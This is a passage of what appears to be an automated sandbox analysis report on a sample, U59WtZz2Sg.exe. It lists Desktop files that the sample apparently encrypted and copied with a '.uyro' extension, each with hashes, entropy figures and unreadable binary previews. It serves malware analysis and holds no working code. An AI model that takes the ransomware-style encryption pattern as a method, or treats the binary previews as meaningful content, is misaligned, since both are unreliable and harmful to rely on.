C:\Users\user\Desktop\NWTVCDUMOB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85716091818859
Encrypted:	false
SSDEEP:	24:hwlo4CkHJlanL3CTguQOHz+XV00mLNM03Iyle/HY87rRdnBZT4tnbD:hJXmJlanGRkVxo31leA4nf8tD
MD5:	E5C22AE468E9178C7E25496789C033E7
SHA1:	938D950EE272F83006B61D7802548EAD9D0A7BF3
SHA-256:	83137C1E85885A9CF79213FAA42108233F0275DE89B15BA0BFA11DD659A556BE
SHA-512:	142679466B27B1D555D1289563F9986D1ECA3079491123E26078962E4356E8516EF3D67151C21D9100E7CCA4D6C498743768C4F890B6AC83A1E7C7F7762D8C85
Malicious:	false
Reputation:	unknown
Preview:	NWTVC..R6....<..?..W..X...U...K..o.n..H\.......(..,[HK...n..=.0...\|Y....A.Z..:..6%...Az....{.p.....9...y.O..X[...V.uP.0...Q..wm.-..U...ioF........0......\|QgLb..u....m..g.....e...v...z.[..b.Q.V..M.."O.g.g....v......p.U.p..k..].x.B..............nkv}\E..b....C...#@....$B.5.0&M.P.b...}...BK..7X.At7..tLN..O...Y.W..I2.3$.).C.qy.....m[...._..c2}.s.G..r.M..=.............L.P.?+.#....%..2.8.J......SRT.4.n..]....N.f..,.F.M...f...e.q:...R.........R....o.=.....W}...$....qN.'z."w.K....0...W........K.h...g..InI.nE(..h`N.(....W../'.+....V........,....Qt..N.jE.J}..Sy.ENE.\|..d(..2&..."cF..C.7..Y...\|1s......Bj.._6....Y....1?.Ro2.w...9......\K....z........T...j......./@...n......R.....;.#=...5m.'E.{j...\..e.S.<j....D...On..!..U..e5.jh.La....V.p...^..\{V..HZ...-Y.R.Px...3...`[&.......=1J.r..wx.~../...q.....a.Vn......C`ee.W...GBVW2).q@.....N.B.......f...:$..$h.!..^[..6B.^..B>...Jd..E..E..`......._.'W.......2.......SC92R.E.Y...A...Q....M.x.7l%u*FN.?

C:\Users\user\Desktop\QNCYCDFIJJ.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.829825417039916
Encrypted:	false
SSDEEP:	24:h2Tq8UrB6/YNGsszbmB1CRnlO0eKT+N+UTB2LKJUKO/oGvwzb4AvpFzaHnuvbbD:hOVUF6/YNDabeCRUoTjgA/bAGIPfLzaQ
MD5:	D81777B357E558991D0FB6B2F16F55F8
SHA1:	83A06B6B80B20E01287EBFD5342A2772DD55B4F0
SHA-256:	EA0B91800D754BB1A584F178B7F7B504E132C148B5D25C465A72B9258CCE5ED6
SHA-512:	7876CB249159D53835D3AA807E9DD6B5D629B2277CE24F0BF58BFD0FD607B93DB733C0778BAA27F54A2A22F020820243CA055FCD34474D01833A025A754D03C7
Malicious:	false
Reputation:	unknown
Preview:	QNCYC.o.wF.1.ykX.;.....p.5..8..![....Ot.4.&Y"X..R.r.V..65..d... ..K....s..I2..mP...\|.[..Fy.....&..@:.d..i.3.).(.......em..tO`..p..E..x+ot..pg....R.#-..@..l..X....$..o......h[.;......_.~...9.....LT)...K......K..:.`.K843.^.../J..p.S.7.....Q.q...y.%....Z.x.H...J..l\|.....7664.xl<.!R..P..Q.c..{m.. :.u...<.../.j.,..G..@}.....p.i......'../....4pS..j...../.M..........{aY.......{w.X 0...7.....3..d).x.....F.N8.!%.J.O...2.[/..S4M.U`....v..<..e.u.UT.,.S..........z.V.)."4p.,'....x=..<J..o..../..V8...q....S...`.....#...Tvn.m.[.(Y.#.8..`...Nj/m,..=...oL.q.x......V?[.p.A...V.S...w...Q...p0.i...Hq....v..?......i..(.)nxj.qq...7...n...z.........}..a.}..[...8o.QC."..3..xs...E2..ASQ._......[v=..4.........B..}.{...].h.x............K$....Tv.y..../.7..... ......1.56..........i,.&......$,..f..2=i.ss#t........,%.[.Z.u...Q8%....]....Q<.'....j.=.+d. ..).l...].5.$.....t.!3.L6....a..\|...,.l(Nr..K....g.'..!./..B...O.`.6.T.r.{..6`..Xu. .5R...e_{....Lj.I._?..n

C:\Users\user\Desktop\QNCYCDFIJJ.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.829825417039916
Encrypted:	false
SSDEEP:	24:h2Tq8UrB6/YNGsszbmB1CRnlO0eKT+N+UTB2LKJUKO/oGvwzb4AvpFzaHnuvbbD:hOVUF6/YNDabeCRUoTjgA/bAGIPfLzaQ
MD5:	D81777B357E558991D0FB6B2F16F55F8
SHA1:	83A06B6B80B20E01287EBFD5342A2772DD55B4F0
SHA-256:	EA0B91800D754BB1A584F178B7F7B504E132C148B5D25C465A72B9258CCE5ED6
SHA-512:	7876CB249159D53835D3AA807E9DD6B5D629B2277CE24F0BF58BFD0FD607B93DB733C0778BAA27F54A2A22F020820243CA055FCD34474D01833A025A754D03C7
Malicious:	false
Reputation:	unknown
Preview:	QNCYC.o.wF.1.ykX.;.....p.5..8..![....Ot.4.&Y"X..R.r.V..65..d... ..K....s..I2..mP...\|.[..Fy.....&..@:.d..i.3.).(.......em..tO`..p..E..x+ot..pg....R.#-..@..l..X....$..o......h[.;......_.~...9.....LT)...K......K..:.`.K843.^.../J..p.S.7.....Q.q...y.%....Z.x.H...J..l\|.....7664.xl<.!R..P..Q.c..{m.. :.u...<.../.j.,..G..@}.....p.i......'../....4pS..j...../.M..........{aY.......{w.X 0...7.....3..d).x.....F.N8.!%.J.O...2.[/..S4M.U`....v..<..e.u.UT.,.S..........z.V.)."4p.,'....x=..<J..o..../..V8...q....S...`.....#...Tvn.m.[.(Y.#.8..`...Nj/m,..=...oL.q.x......V?[.p.A...V.S...w...Q...p0.i...Hq....v..?......i..(.)nxj.qq...7...n...z.........}..a.}..[...8o.QC."..3..xs...E2..ASQ._......[v=..4.........B..}.{...].h.x............K$....Tv.y..../.7..... ......1.56..........i,.&......$,..f..2=i.ss#t........,%.[.Z.u...Q8%....]....Q<.'....j.=.+d. ..).l...].5.$.....t.!3.L6....a..\|...,.l(Nr..K....g.'..!./..B...O.`.6.T.r.{..6`..Xu. .5R...e_{....Lj.I._?..n

C:\Users\user\Desktop\RAYHIWGKDI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8391442241414495
Encrypted:	false
SSDEEP:	24:BWSLR/gOrCZC4uEAMzfFO9LzLGbns7Yi+qFfEzrYPgg9hYbD:BBLpL+kYAMbMlqbnIcnz+l3CD
MD5:	4938C044C1E54CDB62E798F66D0EB314
SHA1:	EB0C1A0AC7C74FE21DF499766B338F89834243FA
SHA-256:	C8AA4BCD963996DD9E800530201C8EA2304881DE0FE0E8564F5491BC8ACC0FC5
SHA-512:	D2F004E7B2333D3AAB1C9AABB44AE18D5AFF9FF23F4F35537A823E1E571FDAC4C8DA4771FB43F217A4797A266EAC9E4DB00924E9919A0605B3897C4096FA946D
Malicious:	false
Reputation:	unknown
Preview:	RAYHIW..m....D..u.B.y.e....Mr.{..YD......\n."k@tH.....Y ..3UnzIQ/.@.&..+_$...@......._....."...D'..U....Q #...e......t..d+...>..$@...j...d.S...q..d...'^.....@.A.3.#....7/......:.W.vJ..U...\|..z8tW....z.r...h.tI..?....7.t!........ ....X..6D..%h.}1......._...z.^.J.... i(&2l...$'.......4.+.B.P.dy..rs}....Z.....A....:.[.k}vl[.O4...L."..WU.....O:....A.M..J.o...%....WRvnE..9...\|l'..I....:>Q<..0N....Dv.G..\|.3..Nw..h.Yj~...M..........<.x2....p/.j..x.FX....y.C......$B...s.{..+.zy.1..Za........!!.><$Z........a.N..Ma4.,..;..%rn~.eL..d.....Y&.).".._5..w./....d....+1=.p.s9....4...?..\|.s.g.ae......f@...p..o..o.....p...5.$.w:..F....].P.\....+.O...&.=...Mp.d2.<...AF]AoI..Xw.p$o/.Z/.()q..._..E\|..G...Av........'n._..iy.k....n.j..........d..1.1.^.....D^...UC.F.E.J..x.A..:.b..^a...v)....-.[...q...$u1.Z.!%W'.S...T..4..Ov..(er.1EZ..?..Dk. SX.,\>.".....19<..D.W.+........=.Y.^...5...KIq..k.Q..Y.1FHZ.A..4..M..h......M.N....I..xe.n.....t.a..E..X".x.R.\.

C:\Users\user\Desktop\RAYHIWGKDI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8391442241414495
Encrypted:	false
SSDEEP:	24:BWSLR/gOrCZC4uEAMzfFO9LzLGbns7Yi+qFfEzrYPgg9hYbD:BBLpL+kYAMbMlqbnIcnz+l3CD
MD5:	4938C044C1E54CDB62E798F66D0EB314
SHA1:	EB0C1A0AC7C74FE21DF499766B338F89834243FA
SHA-256:	C8AA4BCD963996DD9E800530201C8EA2304881DE0FE0E8564F5491BC8ACC0FC5
SHA-512:	D2F004E7B2333D3AAB1C9AABB44AE18D5AFF9FF23F4F35537A823E1E571FDAC4C8DA4771FB43F217A4797A266EAC9E4DB00924E9919A0605B3897C4096FA946D
Malicious:	false
Reputation:	unknown
Preview:	RAYHIW..m....D..u.B.y.e....Mr.{..YD......\n."k@tH.....Y ..3UnzIQ/.@.&..+_$...@......._....."...D'..U....Q #...e......t..d+...>..$@...j...d.S...q..d...'^.....@.A.3.#....7/......:.W.vJ..U...\|..z8tW....z.r...h.tI..?....7.t!........ ....X..6D..%h.}1......._...z.^.J.... i(&2l...$'.......4.+.B.P.dy..rs}....Z.....A....:.[.k}vl[.O4...L."..WU.....O:....A.M..J.o...%....WRvnE..9...\|l'..I....:>Q<..0N....Dv.G..\|.3..Nw..h.Yj~...M..........<.x2....p/.j..x.FX....y.C......$B...s.{..+.zy.1..Za........!!.><$Z........a.N..Ma4.,..;..%rn~.eL..d.....Y&.).".._5..w./....d....+1=.p.s9....4...?..\|.s.g.ae......f@...p..o..o.....p...5.$.w:..F....].P.\....+.O...&.=...Mp.d2.<...AF]AoI..Xw.p$o/.Z/.()q..._..E\|..G...Av........'n._..iy.k....n.j..........d..1.1.^.....D^...UC.F.E.J..x.A..:.b..^a...v)....-.[...q...$u1.Z.!%W'.S...T..4..Ov..(er.1EZ..?..Dk. SX.,\>.".....19<..D.W.+........=.Y.^...5...KIq..k.Q..Y.1FHZ.A..4..M..h......M.N....I..xe.n.....t.a..E..X".x.R.\.

C:\Users\user\Desktop\SFPUSAFIOL.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849771188989679
Encrypted:	false
SSDEEP:	24:aSd5Nhj68BhAkH87RbK077kS5JgBl5iMKseNn9zHn0LenUucLbD:aS5883Akwj7D/I5wR0LqUuAD
MD5:	A98161AAE9EF1D680FEDB58287CB22DE
SHA1:	20572B901BA40202D8132A5DBB84EC937F9CFE3E
SHA-256:	553FCDCEC6C59594142832D13DCA07E74AEF47535B189BAF1776C8B408A3C1D6
SHA-512:	DCFC0A3DE51AE3E8C0251C6AB4905F84D9B217D5E7028A0CA862F1AD95A90D08A1217599E1E51458A337705DAE98870ECC42FD05C1E1D13D840528827A18FC8D
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.d2v...7...ot#.u6........m.T.=..``....'9_.dv..s....m2..S/......d..gS.e.,.`.........^I.....4.1.2...(...M...s.6..(.x.....Y%U(..#.2..uE..2........&.$.L.d0`...<...&7..z..2..A`...g..(....../[.:....B.<.6#....&6zc..Y..{.........W}........:.?.....Cj\|..v ..4.K.H.3x.61....]....w>D.xl~qU...@.W3.umJUn.AL..Y..rG2.t.'.........2PH9.(.tE?.!Y...{-..\|;..\|BQ....(.~>.=.+..-..b&.h....[........rl....^.u.....uj\.:.............!(A!_..;.c_. 5.jF..jA!c...W...t....C.R.#..nH...l.Gt>c.y.k..&>}.u...v({...)..p).C.i......Bn..c..[..\|./.`~.Y..Z..D9..9..uL...4.........a....s....[0..n..%.Y....+aI6........................@.=2.]T.\....n..)..e.v..KU...d.b.5F..$se.....V..7...;.keOumK...O..l. A.....Qa.4.V...im.....@[..MC9..;.^...'.....h....N.{....A#Q.:. V;.QJx.F....0.]...c.&....{..^.A...u...1.yV{....m..Q1..ZVF.\|..C.T. .._.I8q.st.gZ....Af1...`.=......T...H...B.........x.H........M..0.u..UF....0.m.....'..........vE.s6..V.j.../..w=.+l.....m\|......P.}Ul:hx....+A....Tt<..

C:\Users\user\Desktop\SFPUSAFIOL.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849771188989679
Encrypted:	false
SSDEEP:	24:aSd5Nhj68BhAkH87RbK077kS5JgBl5iMKseNn9zHn0LenUucLbD:aS5883Akwj7D/I5wR0LqUuAD
MD5:	A98161AAE9EF1D680FEDB58287CB22DE
SHA1:	20572B901BA40202D8132A5DBB84EC937F9CFE3E
SHA-256:	553FCDCEC6C59594142832D13DCA07E74AEF47535B189BAF1776C8B408A3C1D6
SHA-512:	DCFC0A3DE51AE3E8C0251C6AB4905F84D9B217D5E7028A0CA862F1AD95A90D08A1217599E1E51458A337705DAE98870ECC42FD05C1E1D13D840528827A18FC8D
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.d2v...7...ot#.u6........m.T.=..``....'9_.dv..s....m2..S/......d..gS.e.,.`.........^I.....4.1.2...(...M...s.6..(.x.....Y%U(..#.2..uE..2........&.$.L.d0`...<...&7..z..2..A`...g..(....../[.:....B.<.6#....&6zc..Y..{.........W}........:.?.....Cj\|..v ..4.K.H.3x.61....]....w>D.xl~qU...@.W3.umJUn.AL..Y..rG2.t.'.........2PH9.(.tE?.!Y...{-..\|;..\|BQ....(.~>.=.+..-..b&.h....[........rl....^.u.....uj\.:.............!(A!_..;.c_. 5.jF..jA!c...W...t....C.R.#..nH...l.Gt>c.y.k..&>}.u...v({...)..p).C.i......Bn..c..[..\|./.`~.Y..Z..D9..9..uL...4.........a....s....[0..n..%.Y....+aI6........................@.=2.]T.\....n..)..e.v..KU...d.b.5F..$se.....V..7...;.keOumK...O..l. A.....Qa.4.V...im.....@[..MC9..;.^...'.....h....N.{....A#Q.:. V;.QJx.F....0.]...c.&....{..^.A...u...1.yV{....m..Q1..ZVF.\|..C.T. .._.I8q.st.gZ....Af1...`.=......T...H...B.........x.H........M..0.u..UF....0.m.....'..........vE.s6..V.j.../..w=.+l.....m\|......P.}Ul:hx....+A....Tt<..

C:\Users\user\Desktop\SQRKHNBNYN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862039990854707
Encrypted:	false
SSDEEP:	24:Dlf3NMq/53aEc6/FZDaWJsyz0XmLu7/4UgVYy2jHU8XKPPAixfoNfbbD:LlBZOWiE0yyWSNUuKPPAwMfD
MD5:	0508F4F8682FAEBCC3E8C18DB2C83001
SHA1:	7CD880D196A54EF0EECFDC192D8FA874F86745EC
SHA-256:	331DC994B22A730DEF0A05B4425FD345C66940404934AD1449C4E57F94059159
SHA-512:	9D796F520639E2E1A97D41A625C045DDA5DF19C394CDC157C85D145EB80702A5BAF6E157DF51D5C57E1BADF78659BA126D77C25667C554F79400086179653800
Malicious:	false
Reputation:	unknown
Preview:	SQRKHS.....oUQ.L.......A.....Y3..".p.Q.>.w(4{...,K.}...c..O4..0...Wk.....l#.+...o.....!..:5c../..R-\u...'...n.P....f.h.d.v=.~..uwKC0.".WwQ0......T....A...b..L.^...7.;._#.....;....>.8..F.U..3r4g......;.yDz......P.M.....Cx.vV..A..aF.61..Ovn..P@ ..}....qU.,....=......#..g..........k......~{d...2.."...?.8.x,^..p/......q][.KC%.9.Q....e..&.'.G.:X9E&\|"....U..s..5..C<..#.....-.L...t...=....A5..!..f.J. ...JY65I...(k..6........(.J.3.2..e.'.#.JH...]..LP.I.3X.1..}f.l.........-..j.J.&..A.;..!.1.[MEf..[..$.#H..D...9.V........!.#}X.8..^...W..o....[.M..W.K...&>..n.w.i."D...Ak...b......I.<.Z.N........H...o<..(....H......V.....;.h.[...~/..{.....j(.\..] ?<f....:......^\.......hn:{'.b.@.....S,..v..9.}.........a].l~C.Q......T{....S......03......95l..2.b.....vN.k..C.h.l.p.B[.s.3z.o.SV.s..m..K......u....&...e.U0[P!.I.....`.$.S..C_.n. .MPL3.j...u..c/(.$.HA#0H..../..3..T7L... .l..'u....\|..2...i.A)g....?H..zb...(...t.1c.,. ..........G....Z.M..0.d3..x.}...Fs.k1.M

C:\Users\user\Desktop\SQRKHNBNYN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862039990854707
Encrypted:	false
SSDEEP:	24:Dlf3NMq/53aEc6/FZDaWJsyz0XmLu7/4UgVYy2jHU8XKPPAixfoNfbbD:LlBZOWiE0yyWSNUuKPPAwMfD
MD5:	0508F4F8682FAEBCC3E8C18DB2C83001
SHA1:	7CD880D196A54EF0EECFDC192D8FA874F86745EC
SHA-256:	331DC994B22A730DEF0A05B4425FD345C66940404934AD1449C4E57F94059159
SHA-512:	9D796F520639E2E1A97D41A625C045DDA5DF19C394CDC157C85D145EB80702A5BAF6E157DF51D5C57E1BADF78659BA126D77C25667C554F79400086179653800
Malicious:	false
Reputation:	unknown
Preview:	SQRKHS.....oUQ.L.......A.....Y3..".p.Q.>.w(4{...,K.}...c..O4..0...Wk.....l#.+...o.....!..:5c../..R-\u...'...n.P....f.h.d.v=.~..uwKC0.".WwQ0......T....A...b..L.^...7.;._#.....;....>.8..F.U..3r4g......;.yDz......P.M.....Cx.vV..A..aF.61..Ovn..P@ ..}....qU.,....=......#..g..........k......~{d...2.."...?.8.x,^..p/......q][.KC%.9.Q....e..&.'.G.:X9E&\|"....U..s..5..C<..#.....-.L...t...=....A5..!..f.J. ...JY65I...(k..6........(.J.3.2..e.'.#.JH...]..LP.I.3X.1..}f.l.........-..j.J.&..A.;..!.1.[MEf..[..$.#H..D...9.V........!.#}X.8..^...W..o....[.M..W.K...&>..n.w.i."D...Ak...b......I.<.Z.N........H...o<..(....H......V.....;.h.[...~/..{.....j(.\..] ?<f....:......^\.......hn:{'.b.@.....S,..v..9.}.........a].l~C.Q......T{....S......03......95l..2.b.....vN.k..C.h.l.p.B[.s.3z.o.SV.s..m..K......u....&...e.U0[P!.I.....`.$.S..C_.n. .MPL3.j...u..c/(.$.HA#0H..../..3..T7L... .l..'u....\|..2...i.A)g....?H..zb...(...t.1c.,. ..........G....Z.M..0.d3..x.}...Fs.k1.M

C:\Users\user\Desktop\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845611269190396
Encrypted:	false
SSDEEP:	24:1NEJwJMHqA1c1VdLhmEI0qyCVtJ2abzWoxnm4eg7JGbp5JLSpJsbD:EJaVdLfqyitJ2aOoxm4egg5cJmD
MD5:	61AC6A7B94F57A03E7F113ABE6D59AB8
SHA1:	2A433EFC2BE7CB994FFDF941CAD2F68FED6B94AE
SHA-256:	DEC310D36C38B2CFBC6DD53F54922858B57F416FA8C5038D9AB5921466B69E9E
SHA-512:	D68B8DE20FABE5B46A40BD1DA04933E8CE58D43D3BCB24906DFB1FADDCE53719FEACF5A63FBE24DCFB6CA574F1E4D13A2AFCF350C1FB2348772A7701A68CA89F
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.a....y..QV..V........Otw....A.u3.c..D..[.,...p.2@.)..i9;&...\|m3]..............Ivl.3.).E3..bB..........l.......K.b{.!,./G;..o.P..}..t...lUw...)..w....}...u...L.Z.....g.Oj-Oa...52..l....1...=>x!....&..C.Z'..~....A.......9.gr].JZ..>NW.8.H..qM...?u...+..M...n...o....(..<...v#....\...9.t.5L..o..S...bM....0..D..........n...k..%.Qu.....^....w...9Ud......eH2.N..P.;......J.F....q..4n....rn.......J8='.....$.._........N.o_J,>w.o+..&wB^..... ...<...3V.q.a.9.NhU.u<-.Y...j0A....m...s.......U...W.".....)...P.F....QgA..C^.z.^....(. E....5]...k2.%d t,_........}o..J.....#.....3..M..\|....G..&R.,{...'fGw...h...b.i...\..d.r....i..k.95..T.J..Du....1..7.J2...V.4..KdR.nf....]..p..n7y.tMJ...u.d.#N<.F...n....B..Q....Bx9!;......J.M.V...B...f..FL.).....f.....~4..O..z/......8...E...p.....Zo..~%Y.V....q6.n....Ppw..j.....1 .0=A......Y.zr..)2+.......+r...FQ..l.....^....V._..#.:....*...n.rfv......8.PX.....7Q<....CZ.......i.0.4$.0.,....y4...BL2..^....G..

C:\Users\user\Desktop\UOOJJOZIRH.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845611269190396
Encrypted:	false
SSDEEP:	24:1NEJwJMHqA1c1VdLhmEI0qyCVtJ2abzWoxnm4eg7JGbp5JLSpJsbD:EJaVdLfqyitJ2aOoxm4egg5cJmD
MD5:	61AC6A7B94F57A03E7F113ABE6D59AB8
SHA1:	2A433EFC2BE7CB994FFDF941CAD2F68FED6B94AE
SHA-256:	DEC310D36C38B2CFBC6DD53F54922858B57F416FA8C5038D9AB5921466B69E9E
SHA-512:	D68B8DE20FABE5B46A40BD1DA04933E8CE58D43D3BCB24906DFB1FADDCE53719FEACF5A63FBE24DCFB6CA574F1E4D13A2AFCF350C1FB2348772A7701A68CA89F
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.a....y..QV..V........Otw....A.u3.c..D..[.,...p.2@.)..i9;&...\|m3]..............Ivl.3.).E3..bB..........l.......K.b{.!,./G;..o.P..}..t...lUw...)..w....}...u...L.Z.....g.Oj-Oa...52..l....1...=>x!....&..C.Z'..~....A.......9.gr].JZ..>NW.8.H..qM...?u...+..M...n...o....(..<...v#....\...9.t.5L..o..S...bM....0..D..........n...k..%.Qu.....^....w...9Ud......eH2.N..P.;......J.F....q..4n....rn.......J8='.....$.._........N.o_J,>w.o+..&wB^..... ...<...3V.q.a.9.NhU.u<-.Y...j0A....m...s.......U...W.".....)...P.F....QgA..C^.z.^....(. E....5]...k2.%d t,_........}o..J.....#.....3..M..\|....G..&R.,{...'fGw...h...b.i...\..d.r....i..k.95..T.J..Du....1..7.J2...V.4..KdR.nf....]..p..n7y.tMJ...u.d.#N<.F...n....B..Q....Bx9!;......J.M.V...B...f..FL.).....f.....~4..O..z/......8...E...p.....Zo..~%Y.V....q6.n....Ppw..j.....1 .0=A......Y.zr..)2+.......+r...FQ..l.....^....V._..#.:....*...n.rfv......8.PX.....7Q<....CZ.......i.0.4$.0.,....y4...BL2..^....G..

C:\Users\user\Desktop\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846579600422678
Encrypted:	false
SSDEEP:	24:vggmHKC0wk/tEOeAk4UYEJRSn/mDA+QErs04bIPjlbD:UqC0RnFkrGODVQErs0pj1D
MD5:	04FC2A4FC07E35FC1257080F283E5980
SHA1:	A12AF037F1F380B2D2C40AAED89A44C09AED110A
SHA-256:	A1E03CA417F80FEDC3535CEF146302066C59E67241909C644DDE07DAFCDB2ED3
SHA-512:	15AF1ADDEA6C844962628BC308750775BDD9F4DC83A3D6A53C33E5B87CC1C52AB6FAEE22C37631847E079A74CF9F5DF0C71C209BDF9885019EF99EC0AD298098
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.c6..~S2......i.._t....A..C..fK...V...Wpk....G#J...C.c..A.Adp....9x6..\|. .....z.ru.,..;3..X..qf6..,..s.n.r.mJ......U._`........W.V.t...[T..fj.{.al.F..L..(...=..u.2uw&..j.=..6...DlD.......V..f+.2....8D>...@.t....e..ZH..Q..P.#E..^.Qr.....#......y.../....... E.P.,.A....KD.9..)..5q^P....9.k..P.m?$CpCn...'%.^..BF..}+.....,.W.....V..t..l....:.2i.l..2\|j.u..zY...gWEE...4. ..r......#...G^...(]...@.8......6.&K..I..W6.....%.Z...g.i..\/..i'(t.+6$B..\|. ..N.H'[.N...o..#..zu ......B@NVC+..+H.,..l.\|Z.....x.^Y.5Xta..7=...c.......~.-Q._..e....'....^.........X.K...h.... .[.wTbG........+..=.=9..+.g."....1R.0(.. p^...W.....(.xm.bi...\$.R.F..x.....]a.....ai0...Sf=..G...w5]...t3.m..x.....?....=M..o..%.......agb.+.V..>....C.M....E......BjP...Sj..s%.@S..H....s..f...%....2\.]v..aL$..._(..^..H.}V....W..u....\.y....~....S+.\..W.....):V....$...wk.>........fs......4.Q.A.N..NJ.c....B.K'.Q{v\|J......j./F....~.7EsXE!]V.%..8..V..gp..nW.......z.....b.=.m....D....1Z._...{?

C:\Users\user\Desktop\WKXEWIOTXI.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846579600422678
Encrypted:	false
SSDEEP:	24:vggmHKC0wk/tEOeAk4UYEJRSn/mDA+QErs04bIPjlbD:UqC0RnFkrGODVQErs0pj1D
MD5:	04FC2A4FC07E35FC1257080F283E5980
SHA1:	A12AF037F1F380B2D2C40AAED89A44C09AED110A
SHA-256:	A1E03CA417F80FEDC3535CEF146302066C59E67241909C644DDE07DAFCDB2ED3
SHA-512:	15AF1ADDEA6C844962628BC308750775BDD9F4DC83A3D6A53C33E5B87CC1C52AB6FAEE22C37631847E079A74CF9F5DF0C71C209BDF9885019EF99EC0AD298098
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.c6..~S2......i.._t....A..C..fK...V...Wpk....G#J...C.c..A.Adp....9x6..\|. .....z.ru.,..;3..X..qf6..,..s.n.r.mJ......U._`........W.V.t...[T..fj.{.al.F..L..(...=..u.2uw&..j.=..6...DlD.......V..f+.2....8D>...@.t....e..ZH..Q..P.#E..^.Qr.....#......y.../....... E.P.,.A....KD.9..)..5q^P....9.k..P.m?$CpCn...'%.^..BF..}+.....,.W.....V..t..l....:.2i.l..2\|j.u..zY...gWEE...4. ..r......#...G^...(]...@.8......6.&K..I..W6.....%.Z...g.i..\/..i'(t.+6$B..\|. ..N.H'[.N...o..#..zu ......B@NVC+..+H.,..l.\|Z.....x.^Y.5Xta..7=...c.......~.-Q._..e....'....^.........X.K...h.... .[.wTbG........+..=.=9..+.g."....1R.0(.. p^...W.....(.xm.bi...\$.R.F..x.....]a.....ai0...Sf=..G...w5]...t3.m..x.....?....=M..o..%.......agb.+.V..>....C.M....E......BjP...Sj..s%.@S..H....s..f...%....2\.]v..aL$..._(..^..H.}V....W..u....\.y....~....S+.\..W.....):V....$...wk.>........fs......4.Q.A.N..NJ.c....B.K'.Q{v\|J......j./F....~.7EsXE!]V.%..8..V..gp..nW.......z.....b.=.m....D....1Z._...{?

C:\Users\user\Desktop\WKXEWIOTXI.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854778701734807
Encrypted:	false
SSDEEP:	24:RQq7ns9kDtrF0L3AOCo1oNeLLAghZ65bQcla7MEaApUTKKMXKrbeKTskHPoObD:RLns9S84IoNWhgcfaApiKnKrbhskvdD
MD5:	932DBC120B7A12834E5C17EB9D830816
SHA1:	FDA758300CC5E9640994D4C7B6414383B800A757
SHA-256:	27888B61F628C618EA5230E0FF6574F24481A71A0FA8A20376DAD7855B191C64
SHA-512:	44966414E91A4A9F25475C5F1E96267B6EDD14EA427758D119CA48E895797CBA1CEE33CB44085FD6A5476FD332F260C20E732BF60B286E7B8167EF9C975D28CF
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.?\|.....7.p.U...y.Q...".3NV(A5...Cs.....:..}p..v.i...C....o.du..}......4XU.}.......Z..........^..oWL...-.d..k:G.....k..w~p.TI..o...ed..~}.6{j..-ety.I..@.u..\.....7_..\Y...q...9.&.9..)..... Yt.AF..#....&.W....&...g.c.'I-..F^...+.,6.v..A5F(p=.....l.....h../.4...=....OkFt;J..A7...?t..$c.Eel.t.@......o\|.y.b.G..@g.M.n.m......p.......\..i..@.V.o....`..@?e..._F..e.w..;}.+.......'..c).!a.z...{*......:F.8...W...v._.U.`..Z..~.. ....d....)JT...35..f.Pab..h.1c.....,Bd...E9gq&g.I3.Q.W..I.=l.B..\.I.]z2....(.f...3i.t.$q.g....).>t...}....V...D:P$;k.d.g......g.^..$..z......O_..%;~.#....M...4..@?9C...-..L..m.5..g...{.!..%......5O...b._/..<....D;.L.I....K.....&..I.6w..&.&..........~...FA1@v'wu..in.Y.....6v)fPF..1.v.EQdl.??7N.fgU.....z..[.Y...8Gca...q.F.[gw.....(W[?..~n.Y`.M..8f.4..G...JD....8^.'..].Z.>vz...B...(.F-.4%>6.].R......;.....wwu....1.4L.!%#..s'..i.=..A?..hp....K)..... M....b.hF.T..pEq,]..4m....>.Nn/.fC{...W.c........\V.Y._0ZF.[....Et.{....p........G.

C:\Users\user\Desktop\WKXEWIOTXI.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854778701734807
Encrypted:	false
